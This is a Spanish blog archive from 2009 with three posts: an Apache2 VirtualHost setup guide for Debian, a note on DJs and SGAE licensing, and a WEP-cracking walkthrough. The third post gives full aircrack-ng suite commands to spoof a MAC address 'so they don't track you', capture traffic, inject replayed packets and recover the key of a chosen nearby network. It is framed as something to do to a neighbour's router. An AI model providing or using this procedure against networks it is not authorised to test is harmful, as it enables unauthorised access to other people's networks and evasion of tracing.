Archive for 23 abril 2009

h1

Cómo configurar VirtualHosts en Apache2 + Webalizer en Debian (I parte)

23 abril 2009

Estos días he tenido que preparar un servidor Apache2 para que funcionase con varios dominios diferentes desde la misma IP, es decir, que un único servidor Apache alojase y resolviese 2 dominios por separado. Es lo que se conoce como configurar VirtualHosts basados en nombres.

Lo primero es instalar el servidor Apache2:

#apt-get install apache2 apache2-common

Una vez instalado, toda la configuración de Apache está en /etc/apache2/.

Mirando el contenido de este directorio, observamos distintos archivos y directorios, entre los cuales están: sites-available y sites-enabled.

En ambos directorios debe existir un archivo “default”, el cual tomaremos como base para editar la configuración de nuestros Hosts Virtuales. En sites-available tendremos los VirtualHosts disponibles (pero no “activados”) para ser usados y en sites-enabled, tendremos los VirtualHosts que tenemos funcionando. La forma de trabajar entre estos directorios es a través de un enlace simbólico; así el default de sites-enabled será un enlace simbólico del default de sites-available.

Debian incluye sus propias herramientas para activar y desactivar tanto sitios web como módulos:

a2ensite-> Activa un sitio web.
a2dissite-> Desactiva un sitio web
a2enmod-> Activa un módulo de apache disponible en mods-available.
a2dismod->Desactiva un módulo.

Por defecto, apache nos crea un “index.html” como página de inicio de nuestro servidor web. Para desactivarla y comenzar a hacer uso de los VirtualHosts desactivaremos antes este inicio por defecto:

#a2dissite default

Imaginamos que tenemos “dominio1.com” y “dominio2.com”. Vamos a comenzar a preparar estos dos VirtualHosts. Para ello nos dirigimos a /etc/apache2/available-sites/ y utilizaremos el archivo default como base para preparar la configuración de estos, para ello hacemos una copia:

#cp default dominio1.com
#cp default dominio2.com

El contenido de estos dos sitios web lo podemos volcar en /var/www/dominio1 y en /var/www/dominio2 respectivamente. Para ello, creamos estos dos directorios donde volcaremos los contenidos de ambas webs:

#mkdir  /var/www/dominio1
#mkdir  /var/www/dominio2

Una vez creado estos dos directorios volcado el contenido de las webs en ellos, sólo queda editar los archivos de configuración de los hosts virtuales.

Editaremos en primer lugar el del dominio1. Para ello:

#nano /etc/apache2/sites-available/dominio1.com

El cual debe quedar parecido a esto:

#
#  dominio1.com (/etc/apache2/sites-available/www.dominio1.com)
#

NameVirtualHost 192.168.1.3 -> (IP de nuestro servidor)

<VirtualHost 192.168.1.3>
ServerAdmin webmaster@dominio1.com
ServerName  http://www.dominio1.com
ServerAlias dominio1.com *.dominio1.com

# Indexes + Directory Root.
DirectoryIndex index.html index.php
DocumentRoot /var/www/dominio1/

# Logfiles
ErrorLog  /var/www/dominio1/logs/error.log -> (hay que crear los directorios si no existen)
CustomLog /var/www/dominio1/logs/access.log combined -> (hay que crear los directorios si no existen)
</VirtualHost>

Y lo mismo con elotro virtualHost /etc/apache2/sites-available/dominio2.com

#
#  dominio2.com (/etc/apache2/sites-available/www.dominio2.com)
#

NameVirtualHost 192.168.1.3 -> (IP de nuestro servidor)

<VirtualHost 192.168.1.3>
ServerAdmin webmaster@dominio2.com
ServerName  http://www.dominio2.com
ServerAlias dominio2.com *.dominio2.com

# Indexes + Directory Root.
DirectoryIndex index.html index.php
DocumentRoot /var/www/dominio2/

# Logfiles
ErrorLog  /var/www/dominio2/logs/error.log -> (hay que crear los directorios si no existen)
CustomLog /var/www/dominio2/logs/access.log combined -> (hay que crear los directorios si no existen)
</VirtualHost>

Ahora solamente nos queda que activamos los dos sitios:

#a2ensite dominio1.com
#a2ensite dominio2.com

Esto creará el enlace simbolico de estos archivos entre sites-available y sites-enabled. Ahora sólo tendremos que recargar la configuración para que apache coja los cambios.

# /etc/init.d/apache2 reload

y miramos si la configuración de los virtualhosts está bien:

#apache2 -S

VirtualHost configuration:
192.168.1.3:* is a NameVirtualHost
default server dominio1.com (/etc/apache2/sites-enabled/dominio1.com:2)
port * namevhost dominio1.com (/etc/apache2/sites-enabled/dominio1.com:2)
port * namevhost dominio2.com (/etc/apache2/sites-enabled/dominio2.com:2)
Syntax OK

Con esto, ya podemos comprobar si realmente funcionan nuestros VirtualHosts.

* Si no hemos dado de alta dominio1.com y dominio2.com en un servidor de DNS para hacer pruebas podemos editar el /etc/hosts para que las peticiones a esos dominios vayan a nuestros servidor:

192.168.1.3 dominio1.com dominio2.com

En el próximo capítulo veremos como configurar Webalizer para conocer las estadísticas de ambos dominios por separado. 😉

Anuncios
h1

LOS DJ´S NO NECESITAN UNA LICENCIA DE SGAE PARA PODER PINCHAR

20 abril 2009

Últimamente, los amigos de la $GAE, están atacando directamente sobre aquellos que trabajan en salas y locales “pinchando” música, ya sea usando sus copias de seguridad o música guardada en sus disco duros, aún en el caso de que en que dichas salas, se esté ya pagando su correspondiente canon para poder realizar esto.

Si alguno de vosotros es DJ, conoce a alguno o simplemente quire estar mejor informado sobre este tema, os dejo un documento leido en exgae.net donde se explica los derechos fundamentales de cualquier DJ cuando realiza una sesión.

Como curiosidades a destacar para un DJ: no existe ninguna ley que le impida el uso de copias de seguridad para el ejercicio de su actividad, y no se precisa de licencia alguna expedida por ninguna entidad de gestión para el ejercicio libre de la actividad.

Os dejo el documento original AQUÍ. Espero que os aclare muchas dudas! 😉

h1

Inyectar paquetes con un Macbook con Airport

3 abril 2009

Como ya sabéis las airport de los Macbook se resisten a funcionar en modo pasivo para inyectar paquetes, y no podemos usar el archiconocido Kissmac.

Pero si arrancamos con una distribución de Linux, la cosa cambia.

Para el ejemplo podemos usar la mejor distribución que conozco 😛 La Albertux 1.0.1. Os la podéis bajar desde aquí. http://albertoreynolds.es/index.php?secc=downloads

Tambien podeis usar otras como la backtrack http://www.remote-exploit.org/backtrack_download.html

La quemamos y arrancamos el Macbook desde el cd (manteniendo presionado C nada más arrancarlo)

Una vez cargada, abrimos un Terminal y hacemos lo siguiente:

Primero cambiamos la mac de tu wifi (no vaya a ser que te rastreen)

#airmon-ng stop ath0

#ifconfig wifi0 down

#macchanger –mac 00:11:00:11:00:11 wifi0

La ponemos en pie y buscamos redes disponibles

#airmon-ng start wifi0

#airodump-ng ath0

Paramos el proceso pulsando Ctrl-C

Buscamos una red con encriptación wep y con mayor potencia (pwr)

airodump

En este caso nos quedamos con el BSSID 00:17:33:8C:81:77 y el canal CH  11

#airodump-ng -c 11 -w file –bssid 00:17:33:8C:81:77 ath0

Donde -c 11 indica el canal y -w file es el archivo donde se van guardando los paquetes capturados.

Dejamos este Terminal abierto y abrimos otro y ejecutamos:

#aireplay-ng -1 0 -a 00:17:33:8C:81:77  -h  00:11:00:11:00:11 ath0

#aireplay-ng -3 -b 00:17:33:8C:81:77  -h   00:11:00:11:00:11 ath0

Abrimos otro Terminal más sin cerrar los anteriores y cuando hayamos capturado suficientes paquetes ejecutamos:

#aircrack-ng -b 00:17:33:8C:81:77  file-01.cap

Si hay suficientes, saldrá la wep en este formato : [AA:BB:CC:DD:EE… y esa es la wep. Cuando te la pida, tendrás que escribirla sin los puntos, es decir AABBCCDDEE..

3_aircrack

Y así podreis ir a vuestro vecino y decirle que la seguridad de su router no es suficiente y que la incremente… ;-P